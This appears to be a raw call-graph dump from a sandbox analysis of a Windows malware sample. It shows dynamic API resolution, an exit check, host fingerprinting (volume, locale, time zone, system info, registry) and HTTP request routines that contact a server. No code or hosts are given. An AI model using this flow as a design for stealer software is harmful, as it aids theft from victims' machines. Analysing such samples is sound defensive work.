5c45c0 2 API calls 14208->14209 14210 5c41f3 
14209->14210 14211 5c45c0 2 API calls 14210->14211 14212 5c420c 14211->14212 14213 5c45c0 2 API calls 14212->14213 14214 5c4225 14213->14214 14215 5c45c0 2 API calls 14214->14215 14216 5c423e 14215->14216 14217 5c45c0 2 API calls 14216->14217 14218 5c4257 14217->14218 14219 5c45c0 2 API calls 14218->14219 14220 5c4270 14219->14220 14221 5c45c0 2 API calls 14220->14221 14222 5c4289 14221->14222 14223 5c45c0 2 API calls 14222->14223 14224 5c42a2 14223->14224 14225 5c45c0 2 API calls 14224->14225 14226 5c42bb 14225->14226 14227 5c45c0 2 API calls 14226->14227 14228 5c42d4 14227->14228 14229 5c45c0 2 API calls 14228->14229 14230 5c42ed 14229->14230 14231 5c45c0 2 API calls 14230->14231 14232 5c4306 14231->14232 14233 5c45c0 2 API calls 14232->14233 14234 5c431f 14233->14234 14235 5c45c0 2 API calls 14234->14235 14236 5c4338 14235->14236 14237 5c45c0 2 API calls 14236->14237 14238 5c4351 14237->14238 14239 5c45c0 2 API calls 14238->14239 14240 5c436a 14239->14240 14241 5c45c0 2 API calls 14240->14241 14242 5c4383 14241->14242 14243 5c45c0 2 API calls 14242->14243 14244 5c439c 14243->14244 14245 5c45c0 2 API calls 14244->14245 14246 5c43b5 14245->14246 14247 5c45c0 2 API calls 14246->14247 14248 5c43ce 14247->14248 14249 5c45c0 2 API calls 14248->14249 14250 5c43e7 14249->14250 14251 5c45c0 2 API calls 14250->14251 14252 5c4400 14251->14252 14253 5c45c0 2 API calls 14252->14253 14254 5c4419 14253->14254 14255 5c45c0 2 API calls 14254->14255 14256 5c4432 14255->14256 14257 5c45c0 2 API calls 14256->14257 14258 5c444b 14257->14258 14259 5c45c0 2 API calls 14258->14259 14260 5c4464 14259->14260 14261 5c45c0 2 API calls 14260->14261 14262 5c447d 14261->14262 14263 5c45c0 2 API calls 14262->14263 14264 5c4496 14263->14264 14265 5c45c0 2 API calls 14264->14265 14266 5c44af 14265->14266 14267 5c45c0 2 API calls 14266->14267 14268 5c44c8 14267->14268 14269 5c45c0 2 API calls 14268->14269 14270 5c44e1 14269->14270 14271 5c45c0 2 API calls 14270->14271 14272 5c44fa 14271->14272 
14273 5c45c0 2 API calls 14272->14273 14274 5c4513 14273->14274 14275 5c45c0 2 API calls 14274->14275 14276 5c452c 14275->14276 14277 5c45c0 2 API calls 14276->14277 14278 5c4545 14277->14278 14279 5c45c0 2 API calls 14278->14279 14280 5c455e 14279->14280 14281 5c45c0 2 API calls 14280->14281 14282 5c4577 14281->14282 14283 5c45c0 2 API calls 14282->14283 14284 5c4590 14283->14284 14285 5c45c0 2 API calls 14284->14285 14286 5c45a9 14285->14286 14287 5d9c10 14286->14287 14288 5da036 8 API calls 14287->14288 14289 5d9c20 43 API calls 14287->14289 14290 5da0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14288->14290 14291 5da146 14288->14291 14289->14288 14290->14291 14292 5da216 14291->14292 14293 5da153 8 API calls 14291->14293 14294 5da21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14292->14294 14295 5da298 14292->14295 14293->14292 14294->14295 14296 5da2a5 6 API calls 14295->14296 14297 5da337 14295->14297 14296->14297 14298 5da41f 14297->14298 14299 5da344 9 API calls 14297->14299 14300 5da428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14298->14300 14301 5da4a2 14298->14301 14299->14298 14300->14301 14302 5da4dc 14301->14302 14303 5da4ab GetProcAddress GetProcAddress 14301->14303 14304 5da515 14302->14304 14305 5da4e5 GetProcAddress GetProcAddress 14302->14305 14303->14302 14306 5da612 14304->14306 14307 5da522 10 API calls 14304->14307 14305->14304 14308 5da67d 14306->14308 14309 5da61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14306->14309 14307->14306 14310 5da69e 14308->14310 14311 5da686 GetProcAddress 14308->14311 14309->14308 14312 5d5ca3 14310->14312 14313 5da6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14310->14313 14311->14310 14314 5c1590 14312->14314 14313->14312 15435 5c1670 14314->15435 14317 5da7a0 lstrcpy 14318 5c15b5 14317->14318 14319 5da7a0 lstrcpy 14318->14319 14320 5c15c7 14319->14320 14321 5da7a0 lstrcpy 
14320->14321 14322 5c15d9 14321->14322 14323 5da7a0 lstrcpy 14322->14323 14324 5c1663 14323->14324 14325 5d5510 14324->14325 14326 5d5521 14325->14326 14327 5da820 2 API calls 14326->14327 14328 5d552e 14327->14328 14329 5da820 2 API calls 14328->14329 14330 5d553b 14329->14330 14331 5da820 2 API calls 14330->14331 14332 5d5548 14331->14332 14333 5da740 lstrcpy 14332->14333 14334 5d5555 14333->14334 14335 5da740 lstrcpy 14334->14335 14336 5d5562 14335->14336 14337 5da740 lstrcpy 14336->14337 14338 5d556f 14337->14338 14339 5da740 lstrcpy 14338->14339 14379 5d557c 14339->14379 14340 5da740 lstrcpy 14340->14379 14341 5d5643 StrCmpCA 14341->14379 14342 5d56a0 StrCmpCA 14343 5d57dc 14342->14343 14342->14379 14344 5da8a0 lstrcpy 14343->14344 14345 5d57e8 14344->14345 14346 5da820 2 API calls 14345->14346 14347 5d57f6 14346->14347 14349 5da820 2 API calls 14347->14349 14348 5d5856 StrCmpCA 14350 5d5991 14348->14350 14348->14379 14352 5d5805 14349->14352 14351 5da8a0 lstrcpy 14350->14351 14354 5d599d 14351->14354 14355 5c1670 lstrcpy 14352->14355 14353 5c1590 lstrcpy 14353->14379 14357 5da820 2 API calls 14354->14357 14377 5d5811 14355->14377 14356 5da820 lstrlen lstrcpy 14356->14379 14360 5d59ab 14357->14360 14358 5d52c0 25 API calls 14358->14379 14359 5d51f0 20 API calls 14359->14379 14362 5da820 2 API calls 14360->14362 14361 5d5a0b StrCmpCA 14363 5d5a28 14361->14363 14364 5d5a16 Sleep 14361->14364 14367 5d59ba 14362->14367 14365 5da8a0 lstrcpy 14363->14365 14364->14379 14368 5d5a34 14365->14368 14366 5da8a0 lstrcpy 14366->14379 14369 5c1670 lstrcpy 14367->14369 14370 5da820 2 API calls 14368->14370 14369->14377 14371 5d5a43 14370->14371 14372 5da820 2 API calls 14371->14372 14373 5d5a52 14372->14373 14375 5c1670 lstrcpy 14373->14375 14374 5d578a StrCmpCA 14374->14379 14375->14377 14376 5da7a0 lstrcpy 14376->14379 14377->13432 14378 5d593f StrCmpCA 14378->14379 14379->14340 14379->14341 14379->14342 14379->14348 14379->14353 14379->14356 14379->14358 14379->14359 
14379->14361 14379->14366 14379->14374 14379->14376 14379->14378 14381 5d754c 14380->14381 14382 5d7553 GetVolumeInformationA 14380->14382 14381->14382 14387 5d7591 14382->14387 14383 5d75fc GetProcessHeap RtlAllocateHeap 14384 5d7619 14383->14384 14385 5d7628 wsprintfA 14383->14385 14388 5da740 lstrcpy 14384->14388 14386 5da740 lstrcpy 14385->14386 14389 5d5da7 14386->14389 14387->14383 14388->14389 14389->13453 14391 5da7a0 lstrcpy 14390->14391 14392 5c4899 14391->14392 15444 5c47b0 14392->15444 14394 5c48a5 14395 5da740 lstrcpy 14394->14395 14396 5c48d7 14395->14396 14397 5da740 lstrcpy 14396->14397 14398 5c48e4 14397->14398 14399 5da740 lstrcpy 14398->14399 14400 5c48f1 14399->14400 14401 5da740 lstrcpy 14400->14401 14402 5c48fe 14401->14402 14403 5da740 lstrcpy 14402->14403 14404 5c490b InternetOpenA StrCmpCA 14403->14404 14405 5c4944 14404->14405 14406 5c4ecb InternetCloseHandle 14405->14406 15450 5d8b60 14405->15450 14408 5c4ee8 14406->14408 15465 5c9ac0 CryptStringToBinaryA 14408->15465 14409 5c4963 15458 5da920 14409->15458 14412 5c4976 14414 5da8a0 lstrcpy 14412->14414 14419 5c497f 14414->14419 14415 5da820 2 API calls 14416 5c4f05 14415->14416 14417 5da9b0 4 API calls 14416->14417 14420 5c4f1b 14417->14420 14418 5c4f27 ctype 14422 5da7a0 lstrcpy 14418->14422 14423 5da9b0 4 API calls 14419->14423 14421 5da8a0 lstrcpy 14420->14421 14421->14418 14435 5c4f57 14422->14435 14424 5c49a9 14423->14424 14425 5da8a0 lstrcpy 14424->14425 14426 5c49b2 14425->14426 14427 5da9b0 4 API calls 14426->14427 14428 5c49d1 14427->14428 14429 5da8a0 lstrcpy 14428->14429 14430 5c49da 14429->14430 14431 5da920 3 API calls 14430->14431 14432 5c49f8 14431->14432 14433 5da8a0 lstrcpy 14432->14433 14434 5c4a01 14433->14434 14436 5da9b0 4 API calls 14434->14436 14435->13456 14437 5c4a20 14436->14437 14438 5da8a0 lstrcpy 14437->14438 14439 5c4a29 14438->14439 14440 5da9b0 4 API calls 14439->14440 14441 5c4a48 14440->14441 14442 5da8a0 lstrcpy 14441->14442 14443 5c4a51 14442->14443 
14444 5da9b0 4 API calls 14443->14444 14445 5c4a7d 14444->14445 14446 5da920 3 API calls 14445->14446 14447 5c4a84 14446->14447 14448 5da8a0 lstrcpy 14447->14448 14449 5c4a8d 14448->14449 14450 5c4aa3 InternetConnectA 14449->14450 14450->14406 14451 5c4ad3 HttpOpenRequestA 14450->14451 14453 5c4ebe InternetCloseHandle 14451->14453 14454 5c4b28 14451->14454 14453->14406 14455 5da9b0 4 API calls 14454->14455 14456 5c4b3c 14455->14456 14457 5da8a0 lstrcpy 14456->14457 14458 5c4b45 14457->14458 14459 5da920 3 API calls 14458->14459 14460 5c4b63 14459->14460 14461 5da8a0 lstrcpy 14460->14461 14462 5c4b6c 14461->14462 14463 5da9b0 4 API calls 14462->14463 14464 5c4b8b 14463->14464 14465 5da8a0 lstrcpy 14464->14465 14466 5c4b94 14465->14466 14467 5da9b0 4 API calls 14466->14467 14468 5c4bb5 14467->14468 14469 5da8a0 lstrcpy 14468->14469 14470 5c4bbe 14469->14470 14471 5da9b0 4 API calls 14470->14471 14472 5c4bde 14471->14472 14473 5da8a0 lstrcpy 14472->14473 14474 5c4be7 14473->14474 14475 5da9b0 4 API calls 14474->14475 14476 5c4c06 14475->14476 14477 5da8a0 lstrcpy 14476->14477 14478 5c4c0f 14477->14478 14479 5da920 3 API calls 14478->14479 14480 5c4c2d 14479->14480 14481 5da8a0 lstrcpy 14480->14481 14482 5c4c36 14481->14482 14483 5da9b0 4 API calls 14482->14483 14484 5c4c55 14483->14484 14485 5da8a0 lstrcpy 14484->14485 14486 5c4c5e 14485->14486 14487 5da9b0 4 API calls 14486->14487 14488 5c4c7d 14487->14488 14489 5da8a0 lstrcpy 14488->14489 14490 5c4c86 14489->14490 14491 5da920 3 API calls 14490->14491 14492 5c4ca4 14491->14492 14493 5da8a0 lstrcpy 14492->14493 14494 5c4cad 14493->14494 14495 5da9b0 4 API calls 14494->14495 14496 5c4ccc 14495->14496 14497 5da8a0 lstrcpy 14496->14497 14498 5c4cd5 14497->14498 14499 5da9b0 4 API calls 14498->14499 14500 5c4cf6 14499->14500 14501 5da8a0 lstrcpy 14500->14501 14502 5c4cff 14501->14502 14503 5da9b0 4 API calls 14502->14503 14504 5c4d1f 14503->14504 14505 5da8a0 lstrcpy 14504->14505 14506 5c4d28 14505->14506 14507 5da9b0 4 
API calls 14506->14507 14508 5c4d47 14507->14508 14509 5da8a0 lstrcpy 14508->14509 14510 5c4d50 14509->14510 14511 5da920 3 API calls 14510->14511 14512 5c4d6e 14511->14512 14513 5da8a0 lstrcpy 14512->14513 14514 5c4d77 14513->14514 14515 5da740 lstrcpy 14514->14515 14516 5c4d92 14515->14516 14517 5da920 3 API calls 14516->14517 14518 5c4db3 14517->14518 14519 5da920 3 API calls 14518->14519 14520 5c4dba 14519->14520 14521 5da8a0 lstrcpy 14520->14521 14522 5c4dc6 14521->14522 14523 5c4de7 lstrlen 14522->14523 14524 5c4dfa 14523->14524 14525 5c4e03 lstrlen 14524->14525 15464 5daad0 14525->15464 14527 5c4e13 HttpSendRequestA 14528 5c4e32 InternetReadFile 14527->14528 14529 5c4e67 InternetCloseHandle 14528->14529 14534 5c4e5e 14528->14534 14532 5da800 14529->14532 14531 5da9b0 4 API calls 14531->14534 14532->14453 14533 5da8a0 lstrcpy 14533->14534 14534->14528 14534->14529 14534->14531 14534->14533 15471 5daad0 14535->15471 14537 5d17c4 StrCmpCA 14538 5d17cf ExitProcess 14537->14538 14542 5d17d7 14537->14542 14539 5d19c2 14539->13458 14540 5d185d StrCmpCA 14540->14542 14541 5d187f StrCmpCA 14541->14542 14542->14539 14542->14540 14542->14541 14543 5d18f1 StrCmpCA 14542->14543 14544 5d1951 StrCmpCA 14542->14544 14545 5d1970 StrCmpCA 14542->14545 14546 5d1913 StrCmpCA 14542->14546 14547 5d1932 StrCmpCA 14542->14547 14548 5d18ad StrCmpCA 14542->14548 14549 5d18cf StrCmpCA 14542->14549 14550 5da820 lstrlen lstrcpy 14542->14550 14543->14542 14544->14542 14545->14542 14546->14542 14547->14542 14548->14542 14549->14542 14550->14542 14552 5da7a0 lstrcpy 14551->14552 14553 5c5979 14552->14553 14554 5c47b0 2 API calls 14553->14554 14555 5c5985 14554->14555 14556 5da740 lstrcpy 14555->14556 14557 5c59ba 14556->14557 14558 5da740 lstrcpy 14557->14558 14559 5c59c7 14558->14559 14560 5da740 lstrcpy 14559->14560 14561 5c59d4 14560->14561 14562 5da740 lstrcpy 14561->14562 14563 5c59e1 14562->14563 14564 5da740 lstrcpy 14563->14564 14565 5c59ee InternetOpenA StrCmpCA 14564->14565 14566 
5c5a1d 14565->14566 14567 5c5fc3 InternetCloseHandle 14566->14567 14568 5d8b60 3 API calls 14566->14568 14569 5c5fe0 14567->14569 14570 5c5a3c 14568->14570 14572 5c9ac0 4 API calls 14569->14572 14571 5da920 3 API calls 14570->14571 14573 5c5a4f 14571->14573 14574 5c5fe6 14572->14574 14575 5da8a0 lstrcpy 14573->14575 14576 5da820 2 API calls 14574->14576 14578 5c601f ctype 14574->14578 14580 5c5a58 14575->14580 14577 5c5ffd 14576->14577 14579 5da9b0 4 API calls 14577->14579 14582 5da7a0 lstrcpy 14578->14582 14581 5c6013 14579->14581 14584 5da9b0 4 API calls 14580->14584 14583 5da8a0 lstrcpy 14581->14583 14592 5c604f 14582->14592 14583->14578 14585 5c5a82 14584->14585 14586 5da8a0 lstrcpy 14585->14586 14587 5c5a8b 14586->14587 14588 5da9b0 4 API calls 14587->14588 14589 5c5aaa 14588->14589 14590 5da8a0 lstrcpy 14589->14590 14591 5c5ab3 14590->14591 14593 5da920 3 API calls 14591->14593 14592->13464 14594 5c5ad1 14593->14594 14595 5da8a0 lstrcpy 14594->14595 14596 5c5ada 14595->14596 14597 5da9b0 4 API calls 14596->14597 14598 5c5af9 14597->14598 14599 5da8a0 lstrcpy 14598->14599 14600 5c5b02 14599->14600 14601 5da9b0 4 API calls 14600->14601 14602 5c5b21 14601->14602 14603 5da8a0 lstrcpy 14602->14603 14604 5c5b2a 14603->14604 14605 5da9b0 4 API calls 14604->14605 14606 5c5b56 14605->14606 14607 5da920 3 API calls 14606->14607 14608 5c5b5d 14607->14608 14609 5da8a0 lstrcpy 14608->14609 14610 5c5b66 14609->14610 14611 5c5b7c InternetConnectA 14610->14611 14611->14567 14612 5c5bac HttpOpenRequestA 14611->14612 14614 5c5c0b 14612->14614 14615 5c5fb6 InternetCloseHandle 14612->14615 14616 5da9b0 4 API calls 14614->14616 14615->14567 14617 5c5c1f 14616->14617 14618 5da8a0 lstrcpy 14617->14618 14619 5c5c28 14618->14619 14620 5da920 3 API calls 14619->14620 14621 5c5c46 14620->14621 14622 5da8a0 lstrcpy 14621->14622 14623 5c5c4f 14622->14623 14624 5da9b0 4 API calls 14623->14624 14625 5c5c6e 14624->14625 14626 5da8a0 lstrcpy 14625->14626 14627 5c5c77 14626->14627 14628 
5da9b0 4 API calls 14627->14628 14629 5c5c98 14628->14629 14630 5da8a0 lstrcpy 14629->14630 14631 5c5ca1 14630->14631 14632 5da9b0 4 API calls 14631->14632 14633 5c5cc1 14632->14633 14634 5da8a0 lstrcpy 14633->14634 14635 5c5cca 14634->14635 14636 5da9b0 4 API calls 14635->14636 14637 5c5ce9 14636->14637 14638 5da8a0 lstrcpy 14637->14638 14639 5c5cf2 14638->14639 14640 5da920 3 API calls 14639->14640 14641 5c5d10 14640->14641 14642 5da8a0 lstrcpy 14641->14642 14643 5c5d19 14642->14643 14644 5da9b0 4 API calls 14643->14644 14645 5c5d38 14644->14645 14646 5da8a0 lstrcpy 14645->14646 14647 5c5d41 14646->14647 14648 5da9b0 4 API calls 14647->14648 14649 5c5d60 14648->14649 14650 5da8a0 lstrcpy 14649->14650 14651 5c5d69 14650->14651 14652 5da920 3 API calls 14651->14652 14653 5c5d87 14652->14653 14654 5da8a0 lstrcpy 14653->14654 14655 5c5d90 14654->14655 14656 5da9b0 4 API calls 14655->14656 14657 5c5daf 14656->14657 14658 5da8a0 lstrcpy 14657->14658 14659 5c5db8 14658->14659 14660 5da9b0 4 API calls 14659->14660 14661 5c5dd9 14660->14661 14662 5da8a0 lstrcpy 14661->14662 14663 5c5de2 14662->14663 14664 5da9b0 4 API calls 14663->14664 14665 5c5e02 14664->14665 14666 5da8a0 lstrcpy 14665->14666 14667 5c5e0b 14666->14667 14668 5da9b0 4 API calls 14667->14668 14669 5c5e2a 14668->14669 14670 5da8a0 lstrcpy 14669->14670 14671 5c5e33 14670->14671 14672 5da920 3 API calls 14671->14672 14673 5c5e54 14672->14673 14674 5da8a0 lstrcpy 14673->14674 14675 5c5e5d 14674->14675 14676 5c5e70 lstrlen 14675->14676 15472 5daad0 14676->15472 14678 5c5e81 lstrlen GetProcessHeap RtlAllocateHeap 15473 5daad0 14678->15473 14680 5c5eae lstrlen 14681 5c5ebe 14680->14681 14682 5c5ed7 lstrlen 14681->14682 14683 5c5ee7 14682->14683 14684 5c5ef0 lstrlen 14683->14684 14685 5c5f04 14684->14685 14686 5c5f1a lstrlen 14685->14686 15474 5daad0 14686->15474 14688 5c5f2a HttpSendRequestA 14689 5c5f35 InternetReadFile 14688->14689 14690 5c5f6a InternetCloseHandle 14689->14690 14694 5c5f61 14689->14694 
14690->14615 14692 5da9b0 4 API calls 14692->14694 14693 5da8a0 lstrcpy 14693->14694 14694->14689 14694->14690 14694->14692 14694->14693 14697 5d1077 14695->14697 14696 5d1151 14696->13466 14697->14696 14698 5da820 lstrlen lstrcpy 14697->14698 14698->14697 14700 5d0db7 14699->14700 14701 5d0f17 14700->14701 14702 5d0ea4 StrCmpCA 14700->14702 14703 5d0e27 StrCmpCA 14700->14703 14704 5d0e67 StrCmpCA 14700->14704 14705 5da820 lstrlen lstrcpy 14700->14705 14701->13474 14702->14700 14703->14700 14704->14700 14705->14700 14709 5d0f67 14706->14709 14707 5d1044 14707->13482 14708 5d0fb2 StrCmpCA 14708->14709 14709->14707 14709->14708 14710 5da820 lstrlen lstrcpy 14709->14710 14710->14709 14712 5da740 lstrcpy 14711->14712 14713 5d1a26 14712->14713 14714 5da9b0 4 API calls 14713->14714 14715 5d1a37 14714->14715 14716 5da8a0 lstrcpy 14715->14716 14717 5d1a40 14716->14717 14718 5da9b0 4 API calls 14717->14718 14719 5d1a5b 14718->14719 14720 5da8a0 lstrcpy 14719->14720 14721 5d1a64 14720->14721 14722 5da9b0 4 API calls 14721->14722 14723 5d1a7d 14722->14723 14724 5da8a0 lstrcpy 14723->14724 14725 5d1a86 14724->14725 14726 5da9b0 4 API calls 14725->14726 14727 5d1aa1 14726->14727 14728 5da8a0 lstrcpy 14727->14728 14729 5d1aaa 14728->14729 14730 5da9b0 4 API calls 14729->14730 14731 5d1ac3 14730->14731 14732 5da8a0 lstrcpy 14731->14732 14733 5d1acc 14732->14733 14734 5da9b0 4 API calls 14733->14734 14735 5d1ae7 14734->14735 14736 5da8a0 lstrcpy 14735->14736 14737 5d1af0 14736->14737 14738 5da9b0 4 API calls 14737->14738 14739 5d1b09 14738->14739 14740 5da8a0 lstrcpy 14739->14740 14741 5d1b12 14740->14741 14742 5da9b0 4 API calls 14741->14742 14743 5d1b2d 14742->14743 14744 5da8a0 lstrcpy 14743->14744 14745 5d1b36 14744->14745 14746 5da9b0 4 API calls 14745->14746 14747 5d1b4f 14746->14747 14748 5da8a0 lstrcpy 14747->14748 14749 5d1b58 14748->14749 14750 5da9b0 4 API calls 14749->14750 14751 5d1b76 14750->14751 14752 5da8a0 lstrcpy 14751->14752 14753 5d1b7f 14752->14753 14754 
5d7500 6 API calls 14753->14754 14755 5d1b96 14754->14755 14756 5da920 3 API calls 14755->14756 14757 5d1ba9 14756->14757 14758 5da8a0 lstrcpy 14757->14758 14759 5d1bb2 14758->14759 14760 5da9b0 4 API calls 14759->14760 14761 5d1bdc 14760->14761 14762 5da8a0 lstrcpy 14761->14762 14763 5d1be5 14762->14763 14764 5da9b0 4 API calls 14763->14764 14765 5d1c05 14764->14765 14766 5da8a0 lstrcpy 14765->14766 14767 5d1c0e 14766->14767 15475 5d7690 GetProcessHeap RtlAllocateHeap 14767->15475 14770 5da9b0 4 API calls 14771 5d1c2e 14770->14771 14772 5da8a0 lstrcpy 14771->14772 14773 5d1c37 14772->14773 14774 5da9b0 4 API calls 14773->14774 14775 5d1c56 14774->14775 14776 5da8a0 lstrcpy 14775->14776 14777 5d1c5f 14776->14777 14778 5da9b0 4 API calls 14777->14778 14779 5d1c80 14778->14779 14780 5da8a0 lstrcpy 14779->14780 14781 5d1c89 14780->14781 15482 5d77c0 GetCurrentProcess IsWow64Process 14781->15482 14784 5da9b0 4 API calls 14785 5d1ca9 14784->14785 14786 5da8a0 lstrcpy 14785->14786 14787 5d1cb2 14786->14787 14788 5da9b0 4 API calls 14787->14788 14789 5d1cd1 14788->14789 14790 5da8a0 lstrcpy 14789->14790 14791 5d1cda 14790->14791 14792 5da9b0 4 API calls 14791->14792 14793 5d1cfb 14792->14793 14794 5da8a0 lstrcpy 14793->14794 14795 5d1d04 14794->14795 14796 5d7850 3 API calls 14795->14796 14797 5d1d14 14796->14797 14798 5da9b0 4 API calls 14797->14798 14799 5d1d24 14798->14799 14800 5da8a0 lstrcpy 14799->14800 14801 5d1d2d 14800->14801 14802 5da9b0 4 API calls 14801->14802 14803 5d1d4c 14802->14803 14804 5da8a0 lstrcpy 14803->14804 14805 5d1d55 14804->14805 14806 5da9b0 4 API calls 14805->14806 14807 5d1d75 14806->14807 14808 5da8a0 lstrcpy 14807->14808 14809 5d1d7e 14808->14809 14810 5d78e0 3 API calls 14809->14810 14811 5d1d8e 14810->14811 14812 5da9b0 4 API calls 14811->14812 14813 5d1d9e 14812->14813 14814 5da8a0 lstrcpy 14813->14814 14815 5d1da7 14814->14815 14816 5da9b0 4 API calls 14815->14816 14817 5d1dc6 14816->14817 14818 5da8a0 lstrcpy 14817->14818 14819 5d1dcf 
14818->14819 14820 5da9b0 4 API calls 14819->14820 14821 5d1df0 14820->14821 14822 5da8a0 lstrcpy 14821->14822 14823 5d1df9 14822->14823 15484 5d7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14823->15484 14826 5da9b0 4 API calls 14827 5d1e19 14826->14827 14828 5da8a0 lstrcpy 14827->14828 14829 5d1e22 14828->14829 14830 5da9b0 4 API calls 14829->14830 14831 5d1e41 14830->14831 14832 5da8a0 lstrcpy 14831->14832 14833 5d1e4a 14832->14833 14834 5da9b0 4 API calls 14833->14834 14835 5d1e6b 14834->14835 14836 5da8a0 lstrcpy 14835->14836 14837 5d1e74 14836->14837 15486 5d7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14837->15486 14840 5da9b0 4 API calls 14841 5d1e94 14840->14841 14842 5da8a0 lstrcpy 14841->14842 14843 5d1e9d 14842->14843 14844 5da9b0 4 API calls 14843->14844 14845 5d1ebc 14844->14845 14846 5da8a0 lstrcpy 14845->14846 14847 5d1ec5 14846->14847 14848 5da9b0 4 API calls 14847->14848 14849 5d1ee5 14848->14849 14850 5da8a0 lstrcpy 14849->14850 14851 5d1eee 14850->14851 15489 5d7b00 GetUserDefaultLocaleName 14851->15489 14854 5da9b0 4 API calls 14855 5d1f0e 14854->14855 14856 5da8a0 lstrcpy 14855->14856 14857 5d1f17 14856->14857 14858 5da9b0 4 API calls 14857->14858 14859 5d1f36 14858->14859 14860 5da8a0 lstrcpy 14859->14860 14861 5d1f3f 14860->14861 14862 5da9b0 4 API calls 14861->14862 14863 5d1f60 14862->14863 14864 5da8a0 lstrcpy 14863->14864 14865 5d1f69 14864->14865 15493 5d7b90 14865->15493 14867 5d1f80 14868 5da920 3 API calls 14867->14868 14869 5d1f93 14868->14869 14870 5da8a0 lstrcpy 14869->14870 14871 5d1f9c 14870->14871 14872 5da9b0 4 API calls 14871->14872 14873 5d1fc6 14872->14873 14874 5da8a0 lstrcpy 14873->14874 14875 5d1fcf 14874->14875 14876 5da9b0 4 API calls 14875->14876 14877 5d1fef 14876->14877 14878 5da8a0 lstrcpy 14877->14878 14879 5d1ff8 14878->14879 15505 5d7d80 GetSystemPowerStatus 14879->15505 14882 5da9b0 4 API calls 14883 5d2018 14882->14883 14884 5da8a0 lstrcpy 14883->14884 14885 5d2021 14884->14885 14886 
5da9b0 4 API calls 14885->14886 14887 5d2040 14886->14887 14888 5da8a0 lstrcpy 14887->14888 14889 5d2049 14888->14889 14890 5da9b0 4 API calls 14889->14890 14891 5d206a 14890->14891 14892 5da8a0 lstrcpy 14891->14892 14893 5d2073 14892->14893 14894 5d207e GetCurrentProcessId 14893->14894 15507 5d9470 OpenProcess 14894->15507 14897 5da920 3 API calls 14898 5d20a4 14897->14898 14899 5da8a0 lstrcpy 14898->14899 14900 5d20ad 14899->14900 14901 5da9b0 4 API calls 14900->14901 14902 5d20d7 14901->14902 14903 5da8a0 lstrcpy 14902->14903 14904 5d20e0 14903->14904 14905 5da9b0 4 API calls 14904->14905 14906 5d2100 14905->14906 14907 5da8a0 lstrcpy 14906->14907 14908 5d2109 14907->14908 15512 5d7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14908->15512 14911 5da9b0 4 API calls 14912 5d2129 14911->14912 14913 5da8a0 lstrcpy 14912->14913 14914 5d2132 14913->14914 14915 5da9b0 4 API calls 14914->14915 14916 5d2151 14915->14916 14917 5da8a0 lstrcpy 14916->14917 14918 5d215a 14917->14918 14919 5da9b0 4 API calls 14918->14919 14920 5d217b 14919->14920 14921 5da8a0 lstrcpy 14920->14921 14922 5d2184 14921->14922 15516 5d7f60 14922->15516 14925 5da9b0 4 API calls 14926 5d21a4 14925->14926 14927 5da8a0 lstrcpy 14926->14927 14928 5d21ad 14927->14928 14929 5da9b0 4 API calls 14928->14929 14930 5d21cc 14929->14930 14931 5da8a0 lstrcpy 14930->14931 14932 5d21d5 14931->14932 14933 5da9b0 4 API calls 14932->14933 14934 5d21f6 14933->14934 14935 5da8a0 lstrcpy 14934->14935 14936 5d21ff 14935->14936 15529 5d7ed0 GetSystemInfo wsprintfA 14936->15529 14939 5da9b0 4 API calls 14940 5d221f 14939->14940 14941 5da8a0 lstrcpy 14940->14941 14942 5d2228 14941->14942 14943 5da9b0 4 API calls 14942->14943 14944 5d2247 14943->14944 14945 5da8a0 lstrcpy 14944->14945 14946 5d2250 14945->14946 14947 5da9b0 4 API calls 14946->14947 14948 5d2270 14947->14948 14949 5da8a0 lstrcpy 14948->14949 14950 5d2279 14949->14950 15531 5d8100 GetProcessHeap RtlAllocateHeap 14950->15531 14953 5da9b0 4 API calls 14954 
5d2299 14953->14954 14955 5da8a0 lstrcpy 14954->14955 14956 5d22a2 14955->14956 14957 5da9b0 4 API calls 14956->14957 14958 5d22c1 14957->14958 14959 5da8a0 lstrcpy 14958->14959 14960 5d22ca 14959->14960 14961 5da9b0 4 API calls 14960->14961 14962 5d22eb 14961->14962 14963 5da8a0 lstrcpy 14962->14963 14964 5d22f4 14963->14964 15537 5d87c0 14964->15537 14967 5da920 3 API calls 14968 5d231e 14967->14968 14969 5da8a0 lstrcpy 14968->14969 14970 5d2327 14969->14970 14971 5da9b0 4 API calls 14970->14971 14972 5d2351 14971->14972 14973 5da8a0 lstrcpy 14972->14973 14974 5d235a 14973->14974 14975 5da9b0 4 API calls 14974->14975 14976 5d237a 14975->14976 14977 5da8a0 lstrcpy 14976->14977 14978 5d2383 14977->14978 14979 5da9b0 4 API calls 14978->14979 14980 5d23a2 14979->14980 14981 5da8a0 lstrcpy 14980->14981 14982 5d23ab 14981->14982 15542 5d81f0 14982->15542 14984 5d23c2 14985 5da920 3 API calls 14984->14985 14986 5d23d5 14985->14986 14987 5da8a0 lstrcpy 14986->14987 14988 5d23de 14987->14988 14989 5da9b0 4 API calls 14988->14989 14990 5d240a 14989->14990 14991 5da8a0 lstrcpy 14990->14991 14992 5d2413 14991->14992 14993 5da9b0 4 API calls 14992->14993 14994 5d2432 14993->14994 14995 5da8a0 lstrcpy 14994->14995 14996 5d243b 14995->14996 14997 5da9b0 4 API calls 14996->14997 14998 5d245c 14997->14998 14999 5da8a0 lstrcpy 14998->14999 15000 5d2465 14999->15000 15001 5da9b0 4 API calls 15000->15001 15002 5d2484 15001->15002 15003 5da8a0 lstrcpy 15002->15003 15004 5d248d 15003->15004 15005 5da9b0 4 API calls 15004->15005 15006 5d24ae 15005->15006 15007 5da8a0 lstrcpy 15006->15007 15008 5d24b7 15007->15008 15550 5d8320 15008->15550 15010 5d24d3 15011 5da920 3 API calls 15010->15011 15012 5d24e6 15011->15012 15013 5da8a0 lstrcpy 15012->15013 15014 5d24ef 15013->15014 15015 5da9b0 4 API calls 15014->15015 15016 5d2519 15015->15016 15017 5da8a0 lstrcpy 15016->15017 15018 5d2522 15017->15018 15019 5da9b0 4 API calls 15018->15019 15020 5d2543 15019->15020 15021 5da8a0 lstrcpy 
